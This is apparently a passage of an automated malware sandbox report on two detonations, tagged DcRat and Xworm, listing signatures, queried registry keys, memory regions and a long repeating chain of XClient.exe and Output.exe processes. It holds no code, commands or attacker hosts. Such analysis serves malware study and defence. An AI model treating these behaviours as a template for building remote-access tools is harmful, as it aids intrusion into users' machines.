Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
DcRat
Dcrat family
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1a4ae15ef300f51f70607edc1e8e62a3.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1a4ae15ef300f51f70607edc1e8e62a3.exe
"C:\Users\Admin\AppData\Local\Temp\1a4ae15ef300f51f70607edc1e8e62a3.exe"
Network
Files
memory/2460-0-0x000007FEF5803000-0x000007FEF5804000-memory.dmp
memory/2460-1-0x0000000000D70000-0x0000000000F7A000-memory.dmp
memory/2460-2-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp
memory/2460-3-0x00000000003D0000-0x00000000003DE000-memory.dmp
memory/2460-4-0x00000000003E0000-0x00000000003EE000-memory.dmp
memory/2460-5-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
150s
Max time network
145s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1b0acebe24bf7a0fa1e25e0e9174184ad9827298b7ff75384049deed6e74c306.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
Executes dropped EXE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1b0acebe24bf7a0fa1e25e0e9174184ad9827298b7ff75384049deed6e74c306.exe
"C:\Users\Admin\AppData\Local\Temp\1b0acebe24bf7a0fa1e25e0e9174184ad9827298b7ff75384049deed6e74c306.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
